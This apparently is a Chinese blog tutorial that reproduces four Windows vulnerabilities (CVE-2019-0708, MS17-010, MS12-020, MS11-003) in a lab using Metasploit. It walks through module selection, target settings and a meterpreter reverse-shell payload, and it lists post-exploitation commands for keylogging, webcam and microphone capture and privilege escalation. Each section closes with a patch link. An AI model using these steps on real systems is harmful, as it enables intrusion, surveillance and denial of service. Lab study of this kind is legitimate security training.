metasploit-framework(MSF)多漏洞复现案例(一)

目录

一、CVE-2019-0708复现

1、漏洞探测

2、启动kali使用攻击

1.使用msfconsole进入metasploit-framework(MSF)攻击框架

2.search cve-2019-0708搜索渗透攻击模块

3.use 3 选择要利用的模块,info查看模块说明

4.配置靶机安装环境set target  3 

5.show options 查看配置,set rhosts设置被ip等

6.run攻击

漏洞修复:

二、MS17-010复现

1、漏洞探测

2、启动kali使用攻击

1.使用msfconsole进入metasploit-framework(MSF)攻击框架

2.search ms17-010搜索渗透攻击模块

3.use 2 选择要利用的模块,配置set rhosts   

4.run攻击

渗透后命令参考:

漏洞修复:

三、MS12-020漏洞复现

1、漏洞探测

 ​编辑1.使用msfconsole进入metasploit-framework…(MSF)攻击框架 

   ​编辑2.search ms12-020搜索渗透攻击模块,use 1选择Dos攻击

  ​编辑 3.show options 查看配置,set rhosts设置被ip等    

​编辑4.run攻击

漏洞修复:

三、MS11-003_IE_CSS_IMPORT

1.msfconsole启动msfconsole进入metasploit-framework…(MSF)攻击框架

2.search ms11-003搜索渗透攻击模块,use 3调用模块

3.show options 查看配置,set rhosts设置被ip等

4.run生成木马连接

5.靶机用IE浏览器访问该链接

6.sessions 查看上线的主机 sessions 1调用会话

漏洞修复:



一、CVE-2019-0708复现

        漏洞介绍:通过利用远程桌面的3389端口,RDP协议进行攻击,从而导致机器蓝屏瘫痪。该漏洞的触发无需任何用户交互操作,这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性!

受影响的版本:Windows7

                         Windows Server 2008 R2

                         Windows Server 2008                 

                         Windows 2003         

                         Windows XP

环境准备:

                攻击机:kali2024             

                靶    机:windows7 旗舰版  192.168.18.23   关闭防火墙

1、漏洞探测

nessus扫描Windows7发现漏洞CVE-2019-0708

2、启动kali使用攻击

1.使用msfconsole进入metasploit-framework(MSF)攻击框架

2.search cve-2019-0708搜索渗透攻击模块

3.use 3 选择要利用的模块,info查看模块说明

4.配置靶机安装环境set target  3 

0  Automatic targeting via fingerprinting是通过指纹识别

5.show options 查看配置,set rhosts设置被ip等

6.run攻击

        靶机蓝屏,攻击成功,这里要注意选择架构时选择正确的系统架构,也可以在攻击时添加patload  (payload  windows/x64/meterpreter/reverse_tcp)反弹shell,控制靶机。

漏洞修复:

官网补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

二、MS17-010复现

        永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。

受影响的版本:Windows Vista

                         Windows Server 2008

                         Windows 7

                         Windows Server 2008 R2。‌

环境准备:
                攻击机:kali2024             
                靶    机:windows7 旗舰版  192.168.18.23   关闭防火墙

1、漏洞探测

nessus扫描Windows7发现漏洞ms17-010

2、启动kali使用攻击


1.使用msfconsole进入metasploit-framework(MSF)攻击框架

2.search ms17-010搜索渗透攻击模块

 根据系统版本使用模块,这边选择windows7版本

3.use 2 选择要利用的模块,配置set rhosts   

4.run攻击

攻击成功

可以远程执行的命令shell,执行靶机的cmd命令

执行screenshot 截取靶机当前桌面截图

渗透后命令参考:

meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本

cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程

漏洞修复:

官方补丁:如何验证是否已安装 MS17-010 - Microsoft 支持

三、MS12-020漏洞复现

        MS12-020是一个针对3389远程桌面RDP协议的漏洞。‌攻击者通过向目标主机的3389端口发送特意构造的RDP数据包,‌可能导致系统崩溃、‌蓝屏重启

受影响的版本:

                        Windows Server 2003

                        Windows Server 2008

                        Windows 7

环境准备:

                环境准备:
                攻击机:kali2024             
                靶    机:windows7 旗舰版  192.168.18.23   关闭防火墙

1、漏洞探测

nessus扫描Windows7发现漏洞ms12-020

 
1.使用msfconsole进入metasploit-framework…(MSF)攻击框架 

   
2.search ms12-020搜索渗透攻击模块,use 1选择Dos攻击

   
3.show options 查看配置,set rhosts设置被ip等    


4.run攻击

漏洞修复:

        官方补丁:Microsoft Security Bulletin MS12-020 - Critical | Microsoft Learn

三、MS11-003_IE_CSS_IMPORT

        MS11-003_IE_CSS_IMPORT是指Microsoft Security Bulletin MS11-003中的一个安全漏洞,影响Internet Explorer(IE)浏览器。这个漏洞允许攻击者通过在CSS文件中使用@import规则来加载外部CSS文件,并且绕过浏览器的同源策略。攻击者可以利用这个漏洞进行跨站脚本攻击(XSS)或CSS历史记录窃取等恶意行为。

受影响的版本:
                        Internet Explorer 6
                        Internet Explorer 7
                        Internet Explorer 8
                        Windows Server 2003
                        Windows XP
                        Windows 7

环境准备:
                环境准备:
                攻击机:kali2024             
                靶    机:windows7 旗舰版  192.168.18.23   关闭防火墙

1.msfconsole启动msfconsole进入metasploit-framework…(MSF)攻击框架

  

2.search ms11-003搜索渗透攻击模块,use 3调用模块

  

3.show options 查看配置,set rhosts设置被ip等

  

4.run生成木马连接

5.靶机用IE浏览器访问该链接

访问后可以看到kali监听上线


6.sessions 查看上线的主机 sessions 1调用会话

获得远控权限

漏洞修复:

                官方补丁:Microsoft 安全公告 MS11-003 - 严重 | Microsoft Learn

  • 14
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值